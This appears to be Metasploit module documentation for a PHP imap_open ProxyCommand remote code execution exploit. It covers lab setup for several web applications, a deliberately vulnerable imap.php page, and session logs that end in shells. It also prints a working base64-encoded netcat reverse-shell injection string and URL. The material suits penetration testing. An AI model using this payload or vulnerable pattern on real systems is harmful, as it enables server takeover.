## Vulnerable Application

  The [imap_open](http://php.net/manual/en/function.imap-open.php) function within php,
  if called without the `/norsh` flag, will attempt to preauthenticate an IMAP session.
  On Debian based systems, including Ubuntu, `rsh` is mapped to the ssh binary. Ssh's 
  `ProxyCommand` option can be passed from `imap_open` to execute arbitrary commands.
  While many custom applications may use `imap_open`, it is reported that the following
  applications are vulnerable: 

* [prestashop](https://github.com/PrestaShop/PrestaShop/blob/0d53d6b58b951ac364ad44671cf1ae9bf7ab6aed/controllers/admin/AdminCustomerThreadsController.php#L1010)
* [SuiteCRM](https://github.com/salesagility/SuiteCRM/blob/153b2bae76097cdba9fc9c025bcd829a702b8687/modules/InboundEmail/EditView.php#L260)
* [e107 v2](https://github.com/e107inc/e107/blob/7570b7ce4e17c03e9759c90889db8e750d566e53/e107_handlers/pop_bounce_handler.php#L83)
* Horde IMP H3

  Prestashop exploitation requires the admin URI, and administrator credentials.

  SuiteCRM exploitation requires administrator credentials.

  e107 v2 exploitation requires administrator credentials.

  Horde IMP H3 requires the IMP test page to be present (default), but no credentials are required.

  Additional applications were reported vulnerable, but exploits were not written. See [#10987](https://github.com/rapid7/metasploit-framework/pull/10987) for additional details.

### Prestashop 1.7.2.4 on Ubuntu 16.04

Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-prestashop-on-ubuntu-17-04-17-10-with-apache2-mariadb-and-php/),
with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod.

```
sudo apt install apache2
sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl stop apache2.service
sudo systemctl start apache2.service
sudo systemctl enable apache2.service
sudo apt-get install mariadb-server mariadb-client
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo systemctl restart mysql.service
sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
sudo phpenmod imap
sudo mysql -u root -p
```

Run the following database commands:

```
CREATE DATABASE prestashop;
CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
```

```
cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
unzip prestashop_1.7.2.4.zip
sudo mkdir -p /var/www/html/prestashop
sudo unzip prestashop.zip -d /var/www/html/prestashop/
sudo chown -R www-data:www-data /var/www/html/prestashop/
sudo chmod -R 755 /var/www/html/prestashop/
sudo nano /etc/apache2/sites-available/prestashop.conf
```

Utilize the following configuration:

```
&lt;VirtualHost *:80>
     ServerAdmin admin@example.com
     DocumentRoot /var/www/html/prestashop/
     ServerName example.com
     ServerAlias www.example.com
     
     &lt;Directory /var/www/html/prestashop/>
        Options +FollowSymlinks
        AllowOverride All
        Require all granted
     &lt;/Directory>
     
     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
     
&lt;/VirtualHost>
```

```
sudo a2ensite prestashop.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
```

Browse to the website, and install with default information.

```
sudo rm -rf /var/www/html/prestashop/install/
```

Now browse to `/admin`, and the first time you'll be redirected to the admin URI.  If not, `sudo ls /var/www/html/prestashop/admin*`.

### SuiteCRM 7.8.23 on Ubuntu 16.04

Mostly derived from [vultr.com](https://www.vultr.com/docs/how-to-install-suitecrm-on-ubuntu-16-04) but adding php's zip and mbstring packages.

```
sudo apt-get install apache2 mariadb-server php7.0 php7.0-mysql php7.0-gd php7.0-curl php7.0-imap libapache2-mod-php7.0 php7.0-mcrypt php7.0-xml php7.0-json php7.0-mbstring php7.0-zip -y
sudo systemctl restart apache2
sudo phpenmod imap
sudo mysql_secure_installation
```

```
wget https://suitecrm.com/files/156/SuiteCRM-7.8/322/SuiteCRM-7.8.23.zip
unzip SuiteCRM-7.8.23.zip
sudo mv SuiteCRM-7.8.23 /var/www/html/suitecrm
sudo chown -R www-data:www-data /var/www/html/suitecrm
sudo chmod -R 777 /var/www/html/suitecrm
sudo nano /etc/apache2/sites-available/suitecrm.conf
```

Utilize the following configuration:

```
&lt;VirtualHost *:80>
 ServerAdmin admin@yourdomain.com
 DocumentRoot /var/www/html/suitecrm/
 ServerName yourdomain.com
 ServerAlias www.yourdomain.com
&lt;Directory /var/www/html/suitecrm/>
 Options FollowSymLinks
 AllowOverride All
&lt;/Directory>
 ErrorLog /var/log/apache2/suitecrm-error_log
 CustomLog /var/log/apache2/suitecrm-access_log common
&lt;/VirtualHost>
```

```
sudo a2ensite suitecrm
sudo a2dissite 000-default.conf
sudo systemctl restart apache2
sudo systemctl restart mysql
```

### e107 2.1.9 on Ubuntu 16.04

Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-e107-cms-on-ubuntu-16-04-18-04-18-10-with-apache2-mariadb-and-php-7-2/),
however with php 7.0 instead of 7.2.

```
sudo apt install apache2 mariadb-server mariadb-client php7.0 libapache2-mod-php7.0 php7.0-common php7.0-mysql php7.0-gmp php7.0-curl php7.0-intl php7.0-mbstring php7.0-xmlrpc php7.0-gd php7.0-bcmath php7.0-xml php7.0-cli php7.0-zip php7.0-imap -y
sudo systemctl restart apache2.service
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo mysql -u root -p
```

Run the following database commands:

```
CREATE DATABASE e107;
CREATE USER 'e107user'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON e107.* TO 'e107user'@'localhost' IDENTIFIED BY 'new_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
```

```
cd /tmp
wget http://sourceforge.net/projects/e107/files/e107/e107%20v2.1.9/e107_2.1.9_full.zip
sudo unzip -d /var/www/html/e107 /tmp/e107_2.1.9_full.zip
sudo chown -R www-data:www-data /var/www/html/e107/
sudo chmod -R 755 /var/www/html/e107/
sudo nano /etc/apache2/sites-available/e107.conf
```

Utilize the following configuration:

```
&lt;VirtualHost *:80>
     ServerAdmin admin@example.com
     DocumentRoot /var/www/html/e107
     ServerName example.com
     ServerAlias www.example.com

     &lt;Directory /var/www/html/e107/>
          Options FollowSymlinks
          AllowOverride All
          Require all granted
     &lt;/Directory>

     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
    
     &lt;Directory /var/www/html/e107/>
            RewriteEngine on
            RewriteBase /
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteRule ^(.*) index.php [PT,L]
    &lt;/Directory>
&lt;/VirtualHost>
```

```
sudo a2ensite e107.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
sudo systemctl restart mysql.server
sudo systemctl restart mysql.service
```

### Horde IMP H3 on Ubuntu 16.04

This worked until about Jan 11, 2019 when ondrej updated php5.6 passed 38.

```
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get --no-install-recommends install -y php-pear
sudo apt-get install -y php5.6 libapache2-mod-php5.6 php5.6-mysql php5.6-mbstring php5.6-mysql php5.6-curl php5.6-xml php5.6-xmlrpc php5.6-imap
sudo update-alternatives --config php
sudo a2enmod  php5.6
sudo a2dismod php7.1
sudo phpenmod imap
sudo service apache2 restart
wget ftp://ftp.horde.org/pub/imp/imp-h3-4.2.tar.gz
wget ftp://ftp.horde.org/pub/horde/horde-3.3.13.tar.gz
tar zxf horde-3.3.13.tar.gz
sudo mv horde-3.3.13 /var/www/html/
tar zxf imp-h3-4.2.tar.gz
sudo mv imp-h3-4.2 /var/www/html/horde-3.3.13/
sudo mv /var/www/html/horde-3.3.13/ /var/www/html/horde
cd /var/www/html/horde
sudo mv imp-h3-4.2/ imp
cd imp/config
sudo cp mime_drivers.php.dist mime_drivers.php
sudo cp prefs.php.dist prefs.php
sudo cp servers.php.dist servers.php
sudo chown -R www-data:www-data /var/www/html/horde/
curl -s http://127.0.0.1/horde/imp/test.php | grep "PHP Mail Server Support Test"
```

Browse to the site, click Administration -> Setup.  Click the caution and stop icons and then "Generate Horde Configuration", and "Generate Mail Configuration".
The test page is located at `/horde/imp/test.php`.

### Custom Page on Ubuntu 16.04

Make sure `php-imap` is installed and enabled.  Create `imap.php` with the following content.

```php
<html>
  <body>
    <h1>imap_open Exploitable Page</h1>
    <p>There are two ways to exploit this page:</p>
    <ol>
      <li><b>GET:</b> Use URL parameter 'server'.  Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</li>
      <li><b>POST: </b> Using parameter 'server' or the form below.</li>
    </ol>
    <form method="post">
      Server: <input type="text" name="server"><br>
      <input type="submit" value="Submit">
    </form>
<?php
  if (isset($_GET["server"]) && !empty($_GET["server"])) {
    $server = htmlspecialchars($_GET["server"]);
  } else {
    $server = $_POST["server"];
  }
  if (!isset($server) || empty($server)) {
    exit;
  }
  echo "<hr><h2>Results:</h2>";
  $mbox = @imap_open("{".$server.":143}INBOX",'username','password');
  echo '<p><b>Received: </b>'.$server.'</p>';

  $errors = imap_errors();
  if (is_array($errors)) {
    $errors = array_unique($errors);
  }
  if (count($errors) && is_array($errors)) {
    $str_errors = '';
    foreach ($errors as $error) {
      $str_errors .= $error . ', ';
    }
    $str_errors = rtrim(trim($str_errors), ',');
  }
  if (!$mbox) {
    echo '<p><b>Errors: </b>' . ($str_errors);
  }
?>

  </body>
</html>
```

## Verification Steps

  1. Install a vulnerable application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/php_imap_open_rce```
  4. Do: ```set TARGETURI [URI]```
  5. Do: ```set USERNAME [username]```
  6. Do: ```set PASSWORD [password]```
  7. Do: ```set target [target]```
  8. Do: ```run```
  9. You should get a shell.

## Options

  **TARGETURI**

  The URI for the target.  This may change by target.  Default is ` `.
  Prestashop should be the admin URI, similar to `/admin2769gx8k3`.

## Scenarios

### PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0

  ```
  resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
  resource (presta.rb)> set TARGETURI /admin2769gx8k3
  TARGETURI => /admin2769gx8k3
  resource (presta.rb)> set USERNAME ubuntu@none.com
  USERNAME => ubuntu@none.com
  resource (presta.rb)> set PASSWORD ubuntuubuntu
  PASSWORD => ubuntuubuntu
  resource (presta.rb)> set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  resource (presta.rb)> set lhost 2.2.2.2
  lhost => 2.2.2.2
  resource (presta.rb)> set target 0
  target => 0
  resource (presta.rb)> set verbose true
  verbose => true
  resource (presta.rb)> exploit
  [*] Started reverse TCP handler on 2.2.2.2:4444 
  [*] Redirected to http://1.1.1.1/admin2769gx8k3/
  [*] Redirected to http://1.1.1.1/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
  [*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://1.1.1.1/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
  [*] Logging in with ubuntu@none.com:ubuntuubuntu
  [*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/1.1.1.1\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
  [+] Login Success, loading admin dashboard to pull tokens
  [*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
  [+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
  [*] IMAP server change left on server, manual revert required.
  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:41964) at 2018-11-20 18:29:28 -0500
  
  uname -a
  Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  ```

### SuiteCRM 7.8.23 on Ubuntu 16.04.4 with PHP 7.0

  ```
  resource (suitecrm.rb)> use exploit/linux/http/php_imap_open_rce
  resource (suitecrm.rb)> set target 1
  target => 1
  resource (suitecrm.rb)> set TARGETURI /
  TARGETURI => /
  resource (suitecrm.rb)> set USERNAME admin
  USERNAME => admin
  resource (suitecrm.rb)> set PASSWORD admin
  PASSWORD => admin
  resource (suitecrm.rb)> set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  resource (suitecrm.rb)> set lhost 2.2.2.2
  lhost => 2.2.2.2
  resource (suitecrm.rb)> set verbose true
  verbose => true
  resource (suitecrm.rb)> exploit
  [*] Started reverse TCP handler on 2.2.2.2:4444 
  [*] Loading login page
  [*] Logging in as admin:admin
  [+] Login Success
  [*] Loading InboundEmail page
  [+] Sending payload with group_id f047031d-1697-3d0d-bd39-5bf499e5470a
  [*] IMAP server config left on server, manual removal required.
  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:32806) at 2018-11-20 18:31:40 -0500
  
  uname -a 
  Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  ```

### e107 2.1.9 on Ubuntu 16.04.4 with PHP 7.0

  ```
  resource (e107.rb)> use exploit/linux/http/php_imap_open_rce
  resource (e107.rb)> set target 2
  target => 2
  resource (e107.rb)> set TARGETURI /
  TARGETURI => /
  resource (e107.rb)> set USERNAME admin
  USERNAME => admin
  resource (e107.rb)> set PASSWORD admin
  PASSWORD => admin
  resource (e107.rb)> set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  resource (e107.rb)> set lhost 2.2.2.2
  lhost => 2.2.2.2
  resource (e107.rb)> set verbose true
  verbose => true
  resource (e107.rb)> exploit
  [*] Started reverse TCP handler on 2.2.2.2:4444 
  [*] Logging in as admin:admin
  [+] Login Success
  [*] Checking if Cron is enabled for triggering
  [+] Storing payload in mail settings
  [*] Loading cron page to execute job manually
  [+] Triggering manual run of mail bounce check cron to execute payload with cron id 3 and etoken 3b6aa8ca02dbd2bf8218874606c5e2f1
  [*] IMAP server config left on server, manual removal required.
  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:50742) at 2018-11-23 20:01:13 -0500
  
  uname -a
  Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  ```

### Custom Page on Ubuntu 16.04

Using the `imap.php` page listed above.

  ```
  msf > use exploit/linux/http/php_imap_open_rce 
  msf exploit(linux/http/php_imap_open_rce) > set target 3
  target => 3
  msf exploit(linux/http/php_imap_open_rce) > set lhost 1.1.1.1
  lhost => 1.1.1.1
  msf exploit(linux/http/php_imap_open_rce) > set rhost 2.2.2.2
  rhost => 2.2.2.2
  msf exploit(linux/http/php_imap_open_rce) > exploit
  
  [*] Started reverse TCP handler on 1.1.1.1:4444 
  [*] Listener started for 300 seconds
  [+] POST request connection string: x -oProxyCommand=`echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI+JjE7IHJtIC90bXAvaWVib3U=|base64$IFS$()-d|bash`}
  [+] GET request connection string: x%20-oProxyCommand=%60echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI%2BJjE7IHJtIC90bXAvaWVib3U=%7Cbase64$IFS$()-d%7Cbash%60%7D
  [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41124) at 2018-11-25 10:52:55 -0500
  
  uname -a
  Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  ```

The GET request was utilized, and the final URL utilized was: `http://2.2.2.2/imap.php?server=x%20-oProxyCommand=%60echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI%2BJjE7IHJtIC90bXAvaWVib3U=%7Cbase64$IFS$()-d%7Cbash%60%7D`
